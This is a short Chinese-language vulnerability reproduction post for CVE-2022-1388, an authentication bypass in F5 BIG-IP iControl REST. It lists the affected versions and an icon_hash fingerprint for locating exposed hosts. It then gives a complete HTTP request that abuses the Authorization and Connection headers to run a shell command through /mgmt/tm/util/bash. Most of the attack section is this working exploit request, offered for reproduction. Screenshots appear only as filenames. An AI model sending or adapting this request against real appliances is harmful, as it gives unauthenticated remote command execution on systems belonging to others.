F5 BIG-IP iControl REST身份认证绕过漏洞 #CVE-2022-1388

漏洞描述

BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。

漏洞影响

11.6.1-16.1.2

网络测绘

icon_hash=”-335242539″

漏洞复现

登录页面

20240411110111378-png (7)

发送请求包(Host设为localhost)

POST /mgmt/tm/util/bash HTTP/1.1
Host: localhost
Authorization: Basic YWRtaW46
X-F5-Auth-Token: a
Connection: close, X-F5-Auth-Token
Content-Length: 39

{"command":"run","utilCmdArgs":"-c id"}

20240411110154210-png (8)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容